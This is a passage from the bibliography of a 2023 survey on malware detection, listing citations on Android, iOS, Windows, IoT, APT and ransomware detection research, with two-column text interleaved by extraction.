Investig. 26 (2018) S118eS126, Proceedings of the Eighteenth Annual [113] E. Raff, C. Nicholas, An alternative to NCD for large sequences, Lempel–Ziv
DFRWS USA. Jaccard distance, in: Proceedings of the 23rd ACM SIGKDD International
[86] S. Hochreiter, J. Schmidhuber, Long short-term memory, Neural Comput. Conference on Knowledge Discovery and Data Mining, ACM, 2017, pp.
9 (8) (1997) 1735e1780. 1007–1015.
[87] B. Athiwaratkun, J.W. Stokes, Malware classification with lstm and gru [114] J. Drew, M. Hahsler, T. Moore, Polymorphic malware detection using
language models and a character-level CNN, in: 2017 IEEE International sequence classification methods and ensembles, EURASIP J. Inf. Secur. 2
Conference on Acoustics, Speech and Signal Processing, ICASSP, 2017, pp. (1) (2017).
2482–2486. [115] Digital: Trends, 2011, https://www.digitaltrends.com/android/
[88] C. Yin, Y. Zhu, J. Fei, X. He, A deep learning approach for intrusion smartphone-sales-exceed-those-of-pcs-for-first-time-applesmashes-
detection using recurrent neural networks, IEEE Access 12 (5) (2017) record/.
21954–21961. [116] M.G. Ciobanu, F. Fasano, F. Martinelli, F. Mercaldo, A. Santone, A data life
[89] V.V. Strelkov, A new similarity measure for histogram comparison and its cycle modeling proposal by means of formal methods, in: Proceedings
application in time series analysis, Pattern Recognit. Lett. 29 (13) (2008) of the 2019 ACM Asia Conference on Computer and Communications
1768–1774. Security, ACM, 2019, pp. 670–672.
[90] B. Kang, H.S. Kim, T. Kim, et al., Fast malware family detection method [117] F. Fasano, F. Martinelli, F. Mercaldo, A. Santone, Energy consumption
using control flow graphs, in: Proceedings of 2011 ACM Symposium on metrics for mobile device dynamic malware detection, Procedia Comput.
Research in Applied Computation, ACM, 2011, pp. 287–292. Sci. 159 (2019) 1045–1052.
[91] L.E. Gonzalez, R.A. Vazquez, Malware classification using euclidean dis- [118] F. Martinelli, F. Mercaldo, A. Santone, Social network polluting contents
tance and artificial neural networks, in: 2013 12th Mexican International detection through deep learning techniques, in: 2019 International Joint
Conference on Artificial Intelligence, MICAI, IEEE, 2013, pp. 103–108. Conference on Neural Networks, IJCNN, IEEE, 2019, pp. 1–10.
[92] C. Annachhatre, T.H. Austin, M. Stamp, Hidden Markov models for [119] X. Xiao, S. Zhang, F. Mercaldo, G. Hu, A.K. Sangaiah, Android malware
malware classification, J. Comput. Virol. Hacking Tech. 11 (2) (2015) detection based on system call sequences andLSTM, Multimedia Tools
59–73. Appl. 78 (4) (2019) 3979–3999.

32
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

[120] V. Rastogi, Y. Chen, X. Jiang, Catch me if you can: evaluating android anti- [145] F. Martinelli, F. Mercaldo, A. Saracino, Bridemaid: An hybrid tool for
malware against transformation attacks, IEEE Trans. Inf. Forensics Secur. accurate detection of android malware, in: Proceedings of the 2017 ACM
9 (1) (2014) 99–108. on Asia Conference on Computer and Communications Security, ACM,
[121] X. Jiang, Y. Zhou, Dissecting android malware: characterization and 2017, pp. 899–901.
evolution, in: 2012 IEEE Symposium on Security and Privacy, IEEE, 2012, [146] A. Shabtai, U. Kanonov, Y. Elovici, C. Glezer, Y. Weiss, Andromaly : a
pp. 95–109. behavioral malware detection framework for android devices, J. Intell.
[122] G. Canfora, F. Martinelli, F. Mercaldo, V. Nardone, A. Santone, C.A. Inf. Syst. 38 (1) (2012) 161–190.
Visaggio, Leila: formal tool for identifying mobile malicious behaviour, [147] T. Blasing, A.D. Schmidt, L. Batyuk, S.A. Camtepe, S. Albayrak, An an-
IEEE Trans. Softw. Eng. 45 (12) (2018) 1230–1252. droid application sandbox system for suspicious software detection, in:
[123] Google: Play, 2015, https://play.google.com/store. Proceedings of 5th International Conference on Malicious and Unwanted
[124] Apk: Tool, 2018, https://ibotpeaches.github.io/Apktool/. Software, 2010.
[125] F. Fasano, F. Martinelli, F. Mercaldo, A. Santone, Investigating mobile [148] B. Dixon, Y. Jiang, A. Jaiantilal, S. Mishra, Location based power analysis
applications quality in official and third-party marketplaces, in: Pro- to detect malicious code in smartphones, in: Proceedings of the 1st ACM
ceedings of the 14th International Conference on Evaluation of Novel Workshop on Security and Privacy in Smartphones and Mobile Devices,
Approaches to Software Engineering, SCITEPRESS-Science and Technology 2011.
Publications, Lda, 2019, pp. 169–178. [149] M. Polino, A. Scorti, F. Maggi, S. Zanero, Jackdaw: Towards automatic
[126] F. Fasano, F. Martinelli, F. Mercaldo, A. Santone, Measuring mobile reverse engineering of large datasets of binaries, in: International Con-
applications quality and security in higher education, in: 2018 IEEE ference on Detection of Intrusions and Malware, and Vulnerability
International Conference on Big Data (Big Data), IEEE, 2018, pp. Assessment, Springer, 2015, pp. 121–143.
5319–5321. [150] W. Enck, P. Gilbert, S. Han, V. Tendulkar, B.G. Chun, L.P. Cox, J. Jung, P.
[127] M. Scalas, D. Maiorca, F. Mercaldo, C.A. Visaggio, F. Martinelli, G. Giac- McDaniel, A.N. Sheth, Taintdroid: an information-flow tracking system for
into, On the effectiveness of system API-related information for android realtime privacy monitoring on smartphones, ACM Trans. Comput. Syst.
ransomware detection, Comput. Secur. 86 (2019) 168–182. (TOCS) 32 (2) (2014) 5.
[128] Ah: Myth, 2018, https://github.com/AhMyth/AhMyth-Android-RAT. [151] A. Shabtai, U. Kanonov, Y. Elovici, Intrusion detection for mobile devices
[129] Droid: Jack, 2018, http://droidjack.net/. using the knowledge-based, temporal abstraction method, J. Syst. Softw.
[130] F. Martinelli, F. Mercaldo, V. Nardone, A. Santone, A.K. Sangaiah, A. 83 (8) (2010) 1524–1537.
Cimitile, Evaluating model checking for cyber threats code obfuscation [152] Y. Zhou, Z. Wang, W. Zhou, X. Jiang, Hey, you, get off of my market:
identification, J. Parallel Distrib. Comput. 119 (2018) 203–218. detecting malicious apps in official and alternative android markets, in:
[131] J. Oberheide, C. Mille, Dissecting the android bouncer, in: SummerCon, Proceedings of the Network and Distributed System Security Symposium,
2012. NDSS, 2012.
[132] F. Mercaldo, V. Nardone, A. Santone, Ransomware inside out, in: 2016 [153] C. Zheng, S. Zhu, S. Dai, G. Gu, X. Gong, X. Han, W. Zou, Smartdroid:
11th International Conference on Availability, Reliability and Security, an automatic system for revealing UI-based trigger conditions in android
ARES, IEEE, 2016, pp. 628–637. applications, in: Proceedings of the 2nd ACMWorkshop on Security and
[133] F. Mercaldo, V. Nardone, A. Santone, C.A. Visaggio, Hey malware, i can Privacy in Smartphones and Mobile Devices, SPSM, New York, NY, USA,
find you!, in: 2016 IEEE 25th International Conference on Enabling 2012, pp. 93–104.
Technologies: Infrastructure for Collaborative Enterprises, WETICE, IEEE, [154] M. Lindorfer, M. Neugschwandtner, L. Weichselbaum, Y. Fratantonio, V.
2016, pp. 261–262. van der Veen, C. Platzer, Andrubis-1, 000, 000 apps later: a view on
[134] T. Petsas, G. Voyatzis, E. Athanasopoulos, M. Polychronakis, S. Ioannidis, current android malware behaviors, in: Proceedings of the 3rd Interna-
Rage against the virtual machine: hindering dynamic analysis of android tional Workshop on Building Analysis Datasets and Gathering Experience
malware, in: Proceedings of the Seventh European Workshop on System Returns for Security, BADGERS, 2014.
Security, ACM, 2014, p. 5.
[155] M. Spreitzenbarth, T. Schreck, F. Echtler, D. Arp, J. Hoffmann, Mobile-
[135] Asma Razgallah, Raphaël Khoury, Sylvain Hallé, Kobra Khanmohammadi,
sandbox: combining static and dynamic analysis with machine-learning
A survey of malware detection in Android apps: Recommendations and
techniques, Int. J. Inf. Secur. 14 (2014) 141–153.
perspectives for future research, Comp. Sci. Rev. (ISSN: 1574-0137) 39
[156] A. Ferrante, E. Medvet, F. Mercaldo, J. Milosevic, C.A. Visaggio, Spotting
(2021) 100358.
the malicious moment: Characterizing malware behavior using dynamic
[136] Shivi Garg, Niyati Baliyan, Comparative analysis of android and iOS from
features, in: 2016 11th International Conference on Availability, Reliability
security viewpoint, Comp. Sci. Rev. (ISSN: 1574-0137) 40 (2021) 100372.
and Security, ARES, IEEE, 2016, pp. 372–381.
[137] G. Canfora, F. Mercaldo, C.A. Visaggio, A classifier of malicious android
[157] H. Hashemi, A. Hamzeh, Visual malware detection using local malicious
applications, in: Proceedings of the 2nd International Workshop on
pattern, J. Comput. Virol. Hacking Tech. 15 (1) (2019) 1–14.
Security of Mobile Applications, in Conjunction with the International
[158] M. Farrokhmanesh, A. Hamzeh, Music classification as a new approach for
Conference on Availability, Reliability and Security, 2013.
malware detection, J. Comput. Virol. Hacking Tech. 15 (2) (2019) 77–96.
[138] A. Cimitile, F. Mercaldo, V. Nardone, A. Santone, C.A. Visaggio, Talos:
[159] H. Rathore, S.K. Sahay, Towards robust android malware detection models
no more ransomware victims with formal methods, Int. J. Inf. Secur. 17
using adversarial learning, in: 2021 IEEE International Conference on Per-
(2017) 1–20.
vasive Computing and Communications Workshops and other Affiliated
[139] G. Canfora, A. Di Sorbo, F. Mercaldo, C.A. Visaggio, Obfuscation techniques
Events (PerCom Workshops), 2021, pp. 424–425.
against signature-based detection: a case study, in: 2015 Mobile Systems
Technologies Workshop, MST, IEEE, 2015, pp. 21–26. [160] R. Surendran, T. Thomas, S. Emmanuel, On existence of common malicious
[140] F. Mercaldo, V. Nardone, A. Santone, C.A. Visaggio, Ransomware steals system call codes in android malware families, IEEE Trans. Reliab. 70 (1)
your phone. formal methods rescue it, in: International Conference on (2021) 248–260.
Formal Techniques for Distributed Objects, Components, and Systems, [161] Y. Hei, et al., Hawk: Rapid android malware detection through hetero-
Springer, 2016, pp. 212–221. geneous graph attention networks, IEEE Trans. Neural Netw. Learn. Syst.
[141] D. Octeau, P. McDaniel, S. Jha, A. Bartel, E. Bodden, J. Klein, Y. Le Traon, Ef- http://dx.doi.org/10.1109/TNNLS.2021.3105617.
fective inter-component communication mapping in android: an essential [162] H. Bai, N. Xie, X. Di, Q. Ye, FAMD: A fast multifeature android malware
step towards holistic security analysis, in: Presented as Part of the 22nd detection framework, design, and implementation, IEEE Access 8 (2020)
USENIX Security Symposium (USENIX Security 13), 2013, pp. 543–558. 194729–194740.
[142] S. Arzt, S. Rasthofer, C. Fritz, E. Bodden, A. Bartel, J. Klein, Y. Le Traon, [163] Han Gao, Shaoyin Cheng, Weiming Zhang, GDroid: Android malware
D. Octeau, P. McDaniel, Flowdroid: precise context, flow, field, object- detection and classification with graph convolutional network, Comput.
sensitive and lifecycle-aware taint analysis for android apps, ACM Secur. (ISSN: 0167-4048) 106 (2021) 102264.
SIGPLAN Not. 49 (6) (2014) 259–269. [164] Satheesh Kumar Sasidharan, Ciza Thomas, ProDroid — An android mal-
[143] M. Lindorfer, M. Neugschwandtner, C. Platzer, Marvin: Efficient and ware detection framework based on profile hidden Markov model,
comprehensive mobile app classification through static and dynamic Pervasive Mob. Comput. (ISSN: 1574-1192) 72 (2021) 101336.
analysis, in: 2015 IEEE 39th Annual Computer Software and Applications [165] J. Xu, Y. Li, R.H. Deng, K. Xu, SDAC: A slow-aging solution for android
Conference (COMPSAC), Vol. 2, IEEE, 2015, pp. 422–433. malware detection using semantic distance based API clustering, IEEE
[144] M. Faiella, A. LaMarra, F. Martinelli, F. Mercaldo, A. Saracino, M. Sheikhal- Trans. Dependable Secure Comput. 19 (2) (2022) 1149–1163.
ishahi, A distributed framework for collaborative and dynamic analysis of [166] Shaojie Yang, Yongjun Wang, Haoran Xu, Fangliang Xu, Mantun Chen,
android malware, in: 2017 25th Euromicro International Conference on An android malware detection and classification approach based on
Parallel, Distributed and Network- Based Processing, PDP, IEEE, 2017, pp. contrastive learning, Comput. Secur. (ISSN: 0167-4048) 123 (2022)
321–328. 102915.

33
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

[167] S. Seraj, S. Khodambashi, M. Pavlidis, et al., HamDroid: permission-based [192] H.H. Pajouh, R. Javidan, R. Khayami, A. Dehghantanha, K.K.R. Choo, A
harmful android anti-malware detection using neural networks, Neural two-layer dimension reduction and two-tier classification model for
Comput. Appl. 34 (2022) 15165–15174. anomaly-based intrusion detection in IoT backbone networks, IEEE Trans.
[168] Hui-juan Zhu, Wei Gu, Liang-min Wang, Zhi-cheng Xu, Victor S. Sheng, Emerg. Top. Comput. 7 (2) (2019) 314–323.
Android malware detection based on multi-head squeeze-and-excitation [193] S. Sharmeen, S. Huda, J.H. Abawajy, W. Nagy Ismail, M.M. Hassan,
residual network, Expert Syst. Appl. (ISSN: 0957-4174) 212 (2023) Malware threats and detection for industrial mobile-IoT networks, IEEE
118705. Access 6 (2018) 15941–15957.
[169] Shannon Williams, Mobile Malware and Exploitation Amongst Biggest [194] A. Lohachab, B. Karambir, L.A. Lohachab, Critical analysis of ddos-an
Cyber Threats for 2020, Security Brief Asia, 2020, [online] Available: emerging security threat over IoT networks, J. Commun. Inf. Netw. 3 (3)
https://securitybrief.asia/story/mobile-malware-and-exploitation- (2018) 57–78.
amongst-biggest-cyber-threats-for-2020. [195] J. Su, V. Danilo Vasconcellos, S. Prasad, S. Daniele, Y. Feng, K. Sakurai,
[170] Swati Khandelwal, ‘Exodus’ Surveillance Malware Found Targeting Ap- Lightweight classification of IoT malware based on image recognition, in:
ple iOS Users, The Hacker News, 2019, [online] Available: https:// 2018 IEEE 42nd Annual Computer Software and Applications Conference,
thehackernews.com/2019/04/exodus-ios-malware.html. COMPSAC, Tokyo, 2018, pp. 664–669.
[171] Swati Khandelwal, Powerful FinSpy Spyware Found Targeting iOS and [196] S. Papafotikas, A. Kakarountas, A machine-learning clustering approach
Android Users in Myanmar, 2019. for intrusion detection to IoT devices, in: 2019 4th South-East Europe De-
[172] D. Damopoulos, G. Kambourakis, S. Gritzalis, iSAM: an iPhone stealth sign Automation, Computer Engineering, Computer Networks and Social
airborne malware, in: IFIP International Information Security Conference, Media Conference (SEEDA-CECNSM), IEEE, 2019, pp. 1–6.
Springer, 2011, pp. 17–28. [197] L. Xiao, X. Wan, X. Lu, Y. Zhang, D. Wu, IoT security techniques based on
[173] L. Garcıa, R.J. Rodrıguez, Apeek under the hood of iOSmalware, in: 2016 machine learning: how do IoT devices use AI to enhance security? IEEE
10th International Conference on Availability, Reliability and Security, Signal Process. Mag. 35 (5) (2018) 41–49.
ARES, 2016. [198] Y.-T. Lee, et al., Cross platform IoT-malware family classification based on
[174] A. Cimitile, F. Martinelli, F. Mercaldo, Machine learning meets iOS mal- printable strings, in: 2020 IEEE 19th International Conference on Trust,
ware: Identifying malicious applications on apple environment, in: ICISSP, Security and Privacy in Computing and Communications (TrustCom),
2017, pp. 487–492. 2020, pp. 775–784.
[175] M. Szydlowski, M. Egele, C. Kruegel, G. Vigna, Challenges for dynamic [199] S.M.P. Dinakarrao, et al., Cognitive and scalable technique for secur-
analysis of iOS applications, in: Open Problems in Network Security, ing IoT networks against malware epidemics, IEEE Access 8 (2020)
Springer, 2012, pp. 65–77. 138508–138528.
[176] M. Lindorfer, B. Miller, M. Neugschwandtner, C. Platzer, Take a bite- [200] M.N. Aman, U. Javaid, B. Sikdar, IoT-Proctor: A secure and lightweight de-
finding the worm in the apple, in: 2013 9th International Conference on vice patching framework for mitigating malware spread in IoT networks,
Information, Communications and Signal Processing, ICICS, IEEE, 2013, pp. IEEE Syst. J. http://dx.doi.org/10.1109/JSYST.2021.3070404.
1–5. [201] T. Trajanovski, N. Zhang, An automated and comprehensive framework
[177] H.H. Pajouh, A. Dehghantanha, R. Khayami, et al., Intelligent OS X malware for IoT botnet detection and analysis (IoT-BDA), IEEE Access 9 (2021)
threat detection with code inspection, J. Comput. Virol. Hacking Tech. 14 124360–124383.
(2018) 213–223. [202] J. Bhayo, R. Jafaq, A. Ahmed, S. Hameed, S.A. Shah, A time-efficient
[178] S. Bojjagani, V.N. Sastry, VAPTAi: A threat model for vulnerability assess- approach toward ddos attack detection in IoT network using SDN, IEEE
ment and penetration testing of android and iOS mobile banking apps, Internet Things J. 9 (5) (2022) 3612–3630.
in: 2017 IEEE 3rd International Conference on Collaboration and Internet [203] R. Kalakoti, S. Nõmm, H. Bahsi, In-depth feature selection for the statisti-
Computing, CIC, 2017, pp. 77–86. cal machine learning-based botnet detection in IoT networks, IEEE Access
[179] G. Zhou, M. Duan, Q. Xi, H. Wu, ChanDet: Detection model for potential 10 (2022) 94518–94535.
channel of iOS applications, J. Phys. Conf. Ser. 1187 (4) (2019). [204] A. Azmoodeh, A. Dehghantanha, M. Conti, K.K.R. Choo, Detecting crypto-
[180] Y. Lee, X. Wang, X. Liao, X. Wang, Understanding illicit UI in iOS apps ransomware in IoT networks based on energy consumption footprint, J.
through hidden UI analysis, IEEE Trans. Dependable Secure Comput. 18 Ambient Intell. Humaniz. Comput. 9 (4) (2018) 1141–1152.
(5) (2021) 2390–2402. [205] I. Ghafira, et al., Detection of advanced persistent threat using
[181] Nir Nissim, et al., Novel active learning methods for enhanced PC malware machine-learning correlation analysis, 89 (2018) 349–359.
detection in windows OS, Expert Syst. Appl. 41 (13) (2014) 5843–5857. [206] S.T. Liu, Y.M. Chen, S.J. Lin, A novel search engine to uncover potential
[182] P.V. Shijo, A. Salim, Integrated static and dynamic analysis for malware victims for APT investigations, in: C.-H. Hsu, X. Li, X. Shi, R. Zheng (Eds.),
detection, Procedia Comput. Sci. 46 (2015) 804–811. NPC 2013, in: LNCS, vol. 8147, Springer, Heidelberg, 2013, pp. 405–416.
[183] Gandeva B. Satrya, Niken D.W. Cahyani, Ritchie F. Andreta, The detection [207] M. Balduzzi, V. Ciangaglini, R. McArdle, Targeted attacks detection with
of 8 type malware botnet using hybrid malware analysis in executable spunge, in: 2013 Eleventh Annual Conference on Privacy, Security and
file windows operating systems, in: Proceedings of the 17th International Trust, IEEE, 2013, pp. 185–194.
Conference on Electronic Commerce 2015, ACM, 2015, p. 5. [208] Z. Ma, Q. Li, X. Meng, Discovering suspicious APT families through a
[184] Tulika Mithal, Kshitij Shah, Dushyant Kumar Singh, Case studies on large-scale domain graph in information-centric IoT, IEEE Access 7 (2019)
intelligent approaches for static malware analysis, in: Emerging Research 13917–13926.
in Computing, Information, Communication and Applications, Springer, [209] X. Liu, L. Li, Z. Ma, X. Lin, J. Cao, Design of APT attack defence system
Singapore, 2016, pp. 555–567. based on dynamic deception, in: 2019 IEEE 5th International Conference
[185] Bander Alsulami, et al., Lightweight behavioral malware detection for on Computer and Communications, ICCC, Chengdu, China, 2019, pp.
windows platforms, in: 2017 12th International Conference on Malicious 1655–1659.
and Unwanted Software, MALWARE, IEEE, 2017, pp. 75–81. [210] H. Sun, C. Shen, C. Weng, A flexible framework for malicious open XML
[186] Shamsul Huda, et al., A hybrid-multi filter-wrapper framework to identify document detection based on APT attacks, in: IEEE INFOCOM 2019 -
run-time behaviour for fast malware detection, Future Gener. Comput. IEEE Conference on Computer Communications Workshops (INFOCOM
Syst. 83 (2018) 193–207. WKSHPS), Paris, France, 2019, pp. 2005–2006.
[187] H. Kim, J. Smith, K.G. Shin, Detecting energy-greedy anomalies and mobile [211] R. Coulter, J. Zhang, L. Pan, Y. Xiang, Unmasking windows advanced
malware variants, in: Proceedings of the 6th International Conference on persistent threat execution, in: 2020 IEEE 19th International Confer-
Mobile Systems, Applications, and Services, 2008. ence on Trust, Security and Privacy in Computing and Communications
[188] S. Dija, J. Ajana, V. Indu, M. Sabarinath, Cyber forensics: Discovering (TrustCom), 2020, pp. 268–276.
traces of malware on windows systems, in: 2020 IEEE Recent Advances [212] Y. Su, Research on APT attack based on game model, in: 2020 IEEE 4th
in Intelligent Computational Systems, RAICS, 2020, pp. 141–146. Information Technology, Networking, Electronic and Automation Control
[189] R. Yang, et al., RATScope: Recording and reconstructing missing Conference, ITNEC, 2020, pp. 295–299.
RAT semantic behaviors for forensic analysis on windows, IEEE [213] W. Alghamdi, M. Schukat, Practical implementation of APTs on PTP
Trans. Dependable Secure Comput. http://dx.doi.org/10.1109/TDSC.2020. time synchronisation networks, in: 2020 31st Irish Signals and Systems
3032570. Conference, ISSC, 2020, pp. 1–5.
[190] S. Yousefi, F. Derakhshan, H. Karimipour, H.S. Aghdasi, An efficient route [214] Y. Qi, R. Jiang, Y. Jia, A. Li, An APT attack analysis framework based on self-
planning model for mobile agents on the internet of things using Markov define rules and mapreduce, in: 2020 IEEE Fifth International Conference
decision process, Ad Hoc Netw. 98 (2020) 102053. on Data Science in Cyberspace, DSC, 2020, pp. 61–66.
[191] M. Al-Asli, T.A. Ghaleb, Review of signature-based techniques in antivirus [215] S.-P. Hong, C.-H. Lim, H.J. Lee, APT attack response system through
products, in: 2019 International Conference on Computer and Information AM-HIDS, in: 2021 23rd International Conference on Advanced
Sciences, ICCIS, IEEE, 2019, pp. 1–6. Communication Technology, ICACT, 2021, pp. 271–274.

34
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

[216] L.-X. Yang, K. Huang, X. Yang, Y. Zhang, Y. Xiang, Y.Y. Tang, Defence [240] S. Song, B. Kim, S. Lee, The effective ransomware prevention technique
against advanced persistent threat through data backup and recovery, using process monitoring on Android platform, Mob. Inf. Syst. 2016
IEEE Trans. Netw. Sci. Eng. 8 (3) (2021) 2001–2013. (2016) 1–9.
[217] T. Halabi, O.A. Wahab, R. Al Mallah, M. Zulkernine, Protecting the internet [241] J. Baldwin, A. Dehghantanha, Leveraging support vector machine for op-
of vehicles against advanced persistent threats: A Bayesian stackelberg code density based detection of crypto-ransomware, in: A. Dehghantanha,
game, IEEE Trans. Reliab. 70 (3) (2021) 970–985. M. Conti, T. Dargahi (Eds.), Cyber Threat Intelligence, in: AIS, vol. 70,
[218] Jaafer Al-Saraireh, Ala’ Masarweh, A novel approach for detecting Springer, Cham, 2018, pp. 107–136.
advanced persistent threats, Egypt. Inform. J. (ISSN: 1110-8665) (2022). [242] A. Adamov, A. Carlsson, Reinforcement learning for anti-ransomware
[219] N. Scaife, H. Carter, P. Traynor, K.R.B. Butler, CryptoLock (and drop testing, in: 2020 IEEE East-West Design & Test Symposium, EWDTS, 2020,
it): stopping ransomware attacks on user data, in: 2016 IEEE 36th pp. 1–5.
International Conference on Distributed Computing Systems, ICDCS, IEEE, [243] S. Homayoun, A. Dehghantanha, M. Ahmadzadeh, S. Hashemi, R. Khayami,
2016. Know abnormal, find evil: Frequent pattern mining for ransomware
[220] T. Dargahi, A. Dehghantanha, P.N. Bahrami, M. Conti, G. Bianchi, L. threat hunting and intelligence, IEEE Trans. Emerg. Top. Comput. 8 (2)
Benedetto, A cyber-kill-chain based taxonomy of crypto-ransomware (2020) 341–351.
features, J. Comput. Virol. Hacking Tech. 15 (4) (2019) 277–305. [244] U. Urooj, M. Aizaini Bin Maarof, B. Ali Saleh Al-rimy, A proposed adaptive
[221] A. Kharraz, W. Robertson, E. Kirda, Protecting against ransomware: a new pre-encryption crypto-ransomware early detection model, in: 2021 3rd
line of research or restating classic ideas? IEEE Secur. Priv. 16 (3) (2018) International Cyber Resilience Conference, CRC, 2021, pp. 1–6.
103–107. [245] D. Min, Y. Ko, R. Walker, J. Lee, Y. Kim, A content-based ransomware
[222] A. Kharaz, S. Arshad, C. Mulliner, W. Robertson, E. Kirda, UNVEIL: detection and backup solid-state drive for ransomware defence, IEEE
a largescale, automated approach to detecting ransomware, in: 25th Trans. Comput.-Aided Des. Integr. Circuits Syst. http://dx.doi.org/10.1109/
USENIX Security Symposium (USENIX Security 2016), USENIX Association, TCAD.2021.3099084.
Austin, TX, 2016, pp. 757–772. [246] F. Khan, C. Ncube, L.K. Ramasamy, S. Kadry, Y. Nam, A digital DNA
[223] J.A. Gomez-Hernandez, L. Álvarez-Gonzaalez, P. Garcıa-Teodoro, R-Locker: sequencing engine for ransomware detection using machine learning,
thwarting ransomware action through a honeyfile-based approach, IEEE Access 8 (2020) 119710–119719.
Comput. Secur. 73 (2018) 389–398. [247] S. Sibi Chakkaravarthy, D. Sangeetha, M.V. Cruz, V. Vaidehi, B. Raman,
[224] B.A.S. Al-rimy, M.A. Maarof, Y.A. Prasetyo, S.Z.M. Shaid, A.F.M. Ariffin, Design of intrusion detection honeypot using social leopard algorithm to
Zero-day aware decision fusion-based model for crypto-ransomware early detect IoT ransomware attacks, IEEE Access 8 (2020) 169944–169956.
detection, Int. J. Integr. Eng. 10 (6) (2018) 82–88. [248] M. Wazid, A.K. Das, S. Shetty, BSFR-SH: Blockchain-enabled security
[225] T. Honda, K. Mukaiyama, T. Shirai, T. Ohki, M. Nishigaki, Ransomware framework against ransomware attacks for smart healthcare, IEEE Trans.
detection considering user’s document editing, in: 2018 IEEE 32nd Consum. Electron. (2022).
International Conference on Advanced Information Networking and
[249] Ahmad O. Almashhadani, Domhnall Carlin, Mustafa Kaiiali, Sakir Sezer,
Applications, AINA, IEEE, 2018.
MFMCNS: a multi-feature and multi-classifier network-based system for
[226] S. Jung, Y. Won, Ransomware detection method based on context-aware
ransomworm detection, Comput. Secur. (ISSN: 0167-4048) 121 (2022)
entropy analysis, Soft Comput. 22 (20) (2018) 6731–6740.
102860.
[227] S. Mehnaz, A. Mudgerikar, E. Bertino, Rwguard: a real-time detection
[250] Eduardo Berrueta, Daniel Morato, Eduardo Magaña, Mikel Izal, Crypto-
system against cryptographic ransomware, in: M. Bailey, T. Holz, M.
ransomware detection using machine learning models in file-sharing
Stamatogiannakis, S. Ioannidis (Eds.), RAID 2018, in: LNCS, vol. 11050,
network scenarios with encrypted traffic, Expert Syst. Appl. (ISSN:
Springer, Cham, 2018, pp. 114–136.
0957-4174) 209 (2022) 118299, http://dx.doi.org/10.1016/j.eswa.2022.
[228] A. Continella, et al., ShieldFS: a self-healing, ransomware-aware filesys-
118299.
tem, in: Proceedings of the 32nd Annual Conference on Computer
[251] Masoudeh Keshavarzi, Hamid Reza Ghaffary, An ontology-driven frame-
Security Applications, ACSAC 2016, ACM, New York, 2016, pp. 336–347.
work for knowledge representation of digital extortion attacks, Comput.
[229] G. Bottazzi, G.F. Italiano, D. Spera, Preventing ransomware attacks through
Hum. Behav. (ISSN: 0747-5632) 139 (2023) 107520.
file system filter drivers, in: Second Italian Conference on Cyber Security,
[252] Liu Liu, Baosheng Wang, Automatic malware detection using deep learn-
Milan, Italy, 2018.
ing based on static analysis, in: ICPCSEE 2017, Part I, CCIS 727, 2017, pp.
[230] D. Morato, E. Berrueta, E. Magana, M. Izal, Ransomware early detection
500–507.
by the analysis of file sharing traffic, J. Netw. Comput. Appl. 124 (2018)
[253] Y. Tang, Deep learning using linear support vector machines, 2013.
14–32.
[231] K. Cabaj, M. Gregorczyk, W. Mazurczyk, Software-defined networking- [254] K. Grosse, N. Papernot, P. Manoharan, M. Backes, P. McDaniel, Adversarial
based crypto ransomware detection using HTTP traffic characteristics, perturbations against deep neural networks for malware classification,
Comput. Electr. Eng. 66 (2018) 353–368. 2016, arXiv:1606.04435.
[232] K. Cabaj, W. Mazurczyk, Using software-defined networking for ran- [255] B. Kolosnjaji, A. Demontis, B. Biggio, D. Maiorca, G. Giacinto, C. Eckert,
somware mitigation: the case of cryptowall, IEEE Netw. 30 (6) (2016) F. Roli, Adversarial malware binaries: Evading deep learning for mal-
14–20. ware detection in executables, in: Proc. 26th Eur. Signal Process. Conf.,
[233] D.F. Netto, K.M. Shony, E.R. Lalson, An integrated approach for detecting EUSIPCO, 2018.
ransomware using static and dynamic analysis, in: 2018 International CET [256] P. Prasse, L. Machlica, T. Pevn, J. Havelka, T. Scheffer, Malware detection
Conference on Control, Communication, and Computing (IC4), IEEE, 2018. by analysing encrypted network traffic with neural networks, in: M. Ceci,
[234] O.M.K. Alhawi, J. Baldwin, A. Dehghantanha, Leveraging machine learning J. Hollmn, L. Todorovski, C. Vens, S. Deroski (Eds.), Machine Learning
techniques for windows ransomware network traffic detection, in: A. and Knowledge Discovery in Databases, Springer International Publishing,
Dehghantanha, M. Conti, T. Dargahi (Eds.), Cyber Threat Intelligence, in: Cham, 2017, pp. 73–88.
AIS, vol. 70, Springer, Cham, 2018, pp. 93–106. [257] M. AL-Hawawreh, N. Moustafa, E. Sitnikova, Identification of malicious
[235] J.-Y. Paik, J.-H. Choi, R. Jin, J. Wang, E.-S. Cho, A storage-level detection activities in industrial internet of things based on deep learning models,
mechanism against crypto-ransomware, in: Proceedings of the 2018 ACM J. Inf. Secur. Appl. 41 (2018) 1–11.
SIGSAC Conference on Computer and Communications Security, CCS 2018, [258] N. Kumar, S. Mukhopadhyay, M. Gupta, A. Handa, K.S. Shukla, Malware
ACM Press, 2018. classification using early-stage behavioral analysis, in: 2019 14th Asia
[236] S.H. Baek, Y. Jung, A. Mohaisen, S. Lee, D. Nyang, SSD-insider: internal Joint Conference on Information Security (AsiaJCIS), 2019, pp. 16–23.
defence of the solid-state drive against ransomware with perfect data [259] M. Rhode, L. Tuson, P. Burnap, K. Jones, Lab to soc: robust features for
recovery, in: 2018 IEEE 38th International Conference on Distributed dynamic malware detection, in: 2019 49th Annual IEEE/IFIP International
Computing Systems, ICDCS, IEEE, 2018. Conference on Dependable Systems and Networks Industry Track, 2019,
[237] N.B. Harikrishnan, K.P. Soman, Detecting ransomware using GURLS, pp. 13–16.
in: 2018 Second International Conference on Advances in Electronics, [260] X. Huang, L. Ma, W. Yang, et al., A method for windows malware
Computers and Communications, ICAECC, IEEE, 2018. detection based on deep learning, J. Signal Process. Syst. 93 (2021)
[238] A. Ferrante, M. Malek, F. Martinelli, F. Mercaldo, J. Milosevic, Extinguishing 265–273.
ransomware - a hybrid approach to android ransomware detection, in: [261] S. Tobiyama, Y. Yamaguchi, H. Shimada, T. Ikuse, T. Yagi, Malware
